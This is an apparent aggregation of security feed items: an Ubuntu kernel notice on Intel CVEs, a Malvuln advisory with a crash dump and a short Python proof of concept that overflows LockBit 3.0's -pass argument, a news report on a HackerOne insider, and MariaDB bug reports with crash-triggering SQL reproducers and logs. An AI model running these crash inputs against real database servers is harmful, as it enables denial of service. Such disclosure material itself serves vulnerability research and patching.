Ubuntu Security Notice 5485-2 - It was discovered that some Intel processors did not completely perform cleanup actions on multi-core shared buffers. A local attacker could possibly use this to expose sensitive information. It was discovered that some Intel processors did not completely perform cleanup actions on microarchitectural fill buffers. A local attacker could possibly use this to expose sensitive information. It was discovered that some Intel processors did not properly perform cleanup during specific special register write operations. A local attacker could possibly use this to expose sensitive information.

=========================================================================  
Ubuntu Security Notice USN-5485-2  
July 01, 2022

linux-oem-5.14 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were mitigated in the Linux kernel.

Software Description:  
- linux-oem-5.14: Linux kernel for OEM systems

Details:

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  linux-image-5.14.0-1044-oem     5.14.0-1044.49  
  linux-image-oem-20.04           5.14.0.1044.40  
  linux-image-oem-20.04b          5.14.0.1044.40  
  linux-image-oem-20.04c          5.14.0.1044.40  
  linux-image-oem-20.04d          5.14.0.1044.40

Please note that fully mitigating processor vulnerabilities requires  
corresponding processor microcode/firmware updates.

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
  https://ubuntu.com/security/notices/USN-5485-2  
  https://ubuntu.com/security/notices/USN-5485-1  
  CVE-2022-21123, CVE-2022-21125, CVE-2022-21166

Package Information:  
  https://launchpad.net/ubuntu/+source/linux-oem-5.14/5.14.0-1044.49

Ubuntu Security Notice USN-5485-2

Lockbit ransomware version 3.0 apparently now requires a password to execute as noted by "@vxunderground", but does not properly check bounds for both the -pass and -k arguments. Supplying a long string of characters for either flag will trigger a unicode stack buffer overflow overwriting the ECX register and structured exception handler (SEH).

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Ransom Lockbit 3.0  
Vulnerability: Local Unicode Buffer Overflow (SEH)  
Description: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a", but doesnt properly check bounds for both the -pass and -k arguments. Supplying a long string of characters for either flag will trigger a unicode stack buffer overflow overwriting the ECX register and structured exception handler (SEH).   
Family: Lockbit  
Type: PE32  
MD5: 38745539b71cf201bb502437f891d799  
Vuln ID: MVID-2022-0620  
ASLR: False  
DEP: True  
CFG: False  
Safe SEH: False  
Disclosure: 07/03/2022

Memory Dump:  
(b4.1c38): Access violation - code c0000005 (first/second chance not available)  
eax=6bce1634 ebx=00000000 ecx=00410041 edx=77729d70 esi=00000000 edi=00000000  
eip=a291273d esp=000a12f8 ebp=000a1318 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  
a291273d ??              ???

0:000> .ecxr  
eax=6bce1634 ebx=00000000 ecx=00410041 edx=77729d70 esi=00000000 edi=00000000  
eip=a291273d esp=000a12f8 ebp=000a1318 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202  
a291273d ??              ???

0:000> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+1b21e  
0041b21e f366a5          rep movs word ptr es:[edi],word ptr [esi]

EXCEPTION_RECORD:  0019f688 -- (.exr 0x19f688)  
ExceptionAddress: 0041b21e (LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+0x0001b21e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 001a0000  
Attempt to write to address 001a0000

PROCESS_NAME:  LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  a291273d

WRITE_ADDRESS:  a291273d 

FOLLOWUP_IP:   
+1b21e  
a291273d ??              ???

FAILED_INSTRUCTION_ADDRESS:   
+1b21e  
a291273d ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  a291273d  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

CONTEXT:  0019f6d8 -- (.cxr 0x19f6d8)  
eax=00000020 ebx=0019fc00 ecx=0000004a edx=0000029a esi=025724f4 edi=001a0000  
eip=0041b21e esp=0019fb38 ebp=0019fb48 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+0x1b21e:  
0041b21e f366a5          rep movs word ptr es:[edi],word ptr [esi]  
Resetting default scope

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 0041b26a to 0041b21e

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_00410041

STACK_TEXT:    
00000000 00000000 lockbit3+0x0

STACK_COMMAND:  .cxr 000000000019F6D8 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  lockbit3

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: lockbit3

IMAGE_NAME:  lockbit3

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000005_lockbit3!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_00410041_BAD_IP_lockbit3

Followup: MachineOwner  
---------

0:000> !exchain  
0019f59c: ntdll!ExecuteHandler2+44 (77729d70)  
0019ffcc: LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce+10041 (00410041)  
Invalid exception stack at 00410041

Exploit/PoC:  
from subprocess import Popen

#Discovery/Credits: malvuln  
#Vulnerability: Unicode Buffer Overflow (SEH)  
#Disclosure: 07/03/2022  
#Hash: 80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce  
#MD5: 38745539b71cf201bb502437f891d799  
#================================================================================================  
#  
#Apparently Lockbit 3.0 - Lockbit Black (aka LockShit), now requires a password to execute E.g.  
#  
#vx-underground commented on 2022-07-03 18:55:48 UTC  
#  
#{04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a  
#  
#https://bazaar.abuse.ch/sample/80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce/  
#===============================================================================================  
#  
#Supplying a long payload of characters for the -pass or -k switches triggers a Buffer Overflow.  
#===============================================================================================

TARGET="LockBit3_80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce.exe"  
BANNER="""  
    __               __   _____ __    _ __   
   / /   ____  _____/ /__/ ___// /_  (_) /_  
  / /   / __ \/ ___/ //_/\__ \/ __ \/ / __/  
 / /___/ /_/ / /__/ ,<  ___/ / / / / / /_    
/_____/\____/\___/_/|_|/____/_/ /_/_/\__/  3.0

                                                                   Unicode Buffer Overflow  
                        By malvuln  
"""

PAYLOAD="A"*666

def doit():  
    Popen([TARGET, "-pass", PAYLOAD], shell=True)

if __name__=="__main__":  
    print(BANNER)  
    doit()

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom Lockbit 3.0 MVID-2022-0620 Buffer Overflow

Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain.
"The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the

Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain.

"The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data."

The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the San Francisco-headquartered company as of June 30.

Calling the incident as a "clear violation" of its values, culture, policies, and employment contracts, HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to "investigate a suspicious vulnerability disclosure" through an off-platform communication from an individual with the handle "rzlr" using "aggressive" and "intimidating" language.

Subsequently, analysis of internal log data used to monitor employee access to customer disclosures traced the exposure to a rogue insider, whose goal, it noted, was to re-submit duplicate vulnerability reports to the same customers using the platform to receive monetary payouts.

"The threat actor created a HackerOne sockpuppet account and had received bounties in a handful of disclosures," HackerOne detailed in a post-mortem incident report, adding seven of its customers received direct communication from the threat actor.

"Following the money trail, we received confirmation that the threat actor's bounty was linked to an account that financially benefited a then-HackerOne employee. Analysis of the threat actor's network traffic provided supplemental evidence connecting the threat actor's primary and sockpuppet accounts."

HackerOne further said it has individually notified customers about the exact bug reports that were accessed by the malicious party along with the time of access, while emphasizing it found no evidence of vulnerability data having been misused or other customer information accessed.

On top of that, the company noted it aims to implement additional logging mechanisms to improve incident response, isolate data to reduce the "blast radius," and enhance processes in place to identify anomalous access and proactively detect insider threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

HackerOne Employee Caught Stealing Vulnerability Reports for Personal Gains

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component sub_select.

step to reproduce:

CREATE TABLE v0 ( v1 DECIMAL UNIQUE CHECK ( CASE 0 \* 27302337.000000 WHEN 34 THEN + 'x' LIKE 'x' OR v1 NOT IN ( -1 / TRUE ^ 2 ) ELSE 7105743.000000 END ) ) ;

 INSERT INTO v0 VALUES ( 90 ) , ( -1 ) , ( 31152443.000000 ) , ( -32768 ) , ( NULL ) , ( NULL ) ;

 INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL ) ;

 INSERT IGNORE INTO v0 ( ) VALUES ( 0 ) , ( 'x' ) , ( 3751286.000000 ) , ( 'x' ) , ( ( v1 = 'x' AND 0 AND 0 ) ) ;

 INSERT INTO v0 VALUES ( 127 ) ;

 INSERT INTO v0 SELECT -2147483648 END FROM v0 AS TEXT JOIN v0 JOIN v0 TABLES ;

 ALTER TABLE v0 ADD ( v2 INT UNIQUE CHECK ( ( v1 = 'x' AND ( ( - ( + ( BINARY 49730460.000000 ) ) ) ) = 'x' BETWEEN 'x' AND 'x' ) ) ) ;

 UPDATE v0 SET v1 = -128 WHERE v1 IS NULL ORDER BY 78 IN ( 'x' , 'x' ) , v1 ;

report (compiled with ASAN):

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f4adf25c850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f4afeb08c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55a35785f747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55a356827120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f4afe4f2870\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 SELECT AVG ( 'x' ) OVER ( PARTITION BY ( ( NOT AVG ( 76698761.000000 ) ) ) IS NOT NULL )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/3

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

gdb bt:

#0  0x00007f4afe4ef808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055a35682706b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x0000000000000000 in ?? ()

#4  0x000055a3561b9ee7 in sub\_select (join=0x629000089208, join\_tab=0x629000089c88, end\_of\_records=false) at /experiment/mariadb-server/sql/sql\_select.cc:21052

#5  0x000055a35625eb8d in do\_select (procedure=0x0, join=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:20602

#6  JOIN::exec\_inner (this=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4735

#7  0x000055a356260593 in JOIN::exec (this=this@entry=0x629000089208) at /experiment/mariadb-server/sql/sql\_select.cc:4513

#8  0x000055a356258b5b in mysql\_select (thd=0x62b0000bd218, tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0, order=0x0, group=0x0, having=0x0, proc\_param=0x0, select\_options=<optimized out>, result=0x629000089140, unit=0x62b0000c13c0, select\_lex=0x629000087ad0)

    at /experiment/mariadb-server/sql/sql\_select.cc:4991

#9  0x000055a35625a655 in handle\_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x629000089140, setup\_tables\_done\_option=setup\_tables\_done\_option@entry=1073741824) at /experiment/mariadb-server/sql/sql\_select.cc:545

#10 0x000055a3560c99c1 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4711

#11 0x000055a3560cc5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#12 0x000055a3560d260c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#13 0x000055a3560d773d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#14 0x000055a356492e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#15 0x000055a35649333d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#16 0x000055a356f23c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#17 0x00007f4afe4e8259 in start\_thread () from /usr/lib/libpthread.so.0

#18 0x00007f4afe0935e3 in clone () from /usr/lib/libc.so.6

CVE-2022-32084: [MDEV-26427] MariaDB Server SEGV issue

MariaDB v10.5 to v10.7 was discovered to contain a segmentation fault via the component st_select_lex_unit::exclude_level.

PoC:

KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 ) ;

crash log:

Version: '10.7.0-MariaDB' socket: '/tmp/12.socket' port: 10012 Source distribution  
210816 15:00:02 \[ERROR\] mysqld got signal 11 ;  
This could be because you hit a bug. It is also possible that this binary  
or one of the libraries it was linked against is corrupt, improperly built,  
or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB  
key\_buffer\_size=134217728  
read\_buffer\_size=131072  
max\_used\_connections=1  
max\_threads=153  
thread\_count=1  
It is possible that mysqld could use up to  
key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K bytes of memory  
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218  
Attempting backtrace. You can use the following information to find out  
where mysqld died. If you see no messages after this, something went  
terribly wrong...  
stack\_bottom = 0x7f677d93c850 thread\_stack 0x5fc00  
sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f679d1e8c3e\]  
mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55ea78116747\]  
sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55ea770de120\]  
sigaction.c:0(\_\_restore\_rt)\[0x7f679cbd2870\]  
sql/sql\_lex.cc:3315(st\_select\_lex\_unit::exclude\_level())\[0x55ea768e1518\]  
sql/item\_subselect.cc:322(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773cff8c\]  
sql/item\_subselect.cc:3562(Item\_in\_subselect::fix\_fields(THD\*, Item\*\*))\[0x55ea773d0c62\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_cmpfunc.cc:6455(Item\_func\_not::fix\_fields(THD\*, Item\*\*))\[0x55ea771cd8c2\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x55ea7727229c\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55ea7698f9d4\]  
sql/sql\_parse.cc:5523(mysql\_execute\_command(THD\*, bool))\[0x55ea76978d5e\]  
sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55ea769835a1\]  
sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55ea7698960c\]  
sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55ea7698e73d\]  
sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55ea76d49e57\]  
sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55ea76d4a33d\]  
perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55ea777dac2c\]  
pthread\_create.c:0(start\_thread)\[0x7f679cbc8259\]  
:0(\__GI_\_\_clone)\[0x7f679c7735e3\]

Trying to get some variables.  
Some pointers may be invalid and cause the dump to abort.  
Query (0x629000087238): KILL STRCMP ( 'x' = 47051287.000000 , TIME ( NOT 'x' IN ( SELECT -32768 ) ) MOD 44 )

Connection ID (thread ID): 4  
Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains  
information that should help you find out what is causing the crash.  
Writing a core file...

CVE-2022-32089: [MDEV-26410] MariaDB server crash in st_select_lex_unit::exclude_level

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_func_in::cleanup/Item::cleanup_processor.

CREATE TABLE v0 ( v1 VARCHAR ( 65 ) CHAR SET ASCII NULL DEFAULT ( 'x' IN ( 'x' , CURRENT\_USER ) ) ) ;

 START TRANSACTION READ WRITE ;

 INSERT INTO v0 VALUES ( v1 ) ;

 SELECT HEX ( GREATEST ( v1 , ( 'x' ) ) ) FROM v0 ;

 INSERT INTO v0 VALUES ( REPEAT ( ( NULL + 84551986.000000 ) = 74599462.000000 , ( HEX ( 18069096.000000 ) ) / -1 = 28 ) ) ;

 DESCRIBE SELECT v0 . v1 FROM v0 , v0 WHERE v0 . v1 = v0 . v1 ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 15:00:28 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 15:00:28 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 15:00:28 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 15:00:28 0 \[Note\] InnoDB: Using liburing

2021-08-16 15:00:28 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 15:00:28 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 15:00:39 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 15:00:39 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 15:00:39 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 15:00:39 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 15:00:39 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 15:00:39 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/9/ib\_buffer\_pool

2021-08-16 15:00:39 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 15:00:40 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 15:00:40 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 15:00:40

2021-08-16 15:00:41 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/9.socket'  port: 10009  Source distribution

210816 15:00:43 \[ERROR\] mysqld got signal 11 ;

This could be because you hit a bug. It is also possible that this binary

or one of the libraries it was linked against is corrupt, improperly built,

or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help

diagnose the problem, but since we have already crashed, 

something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f987ba5b850 thread\_stack 0x5fc00

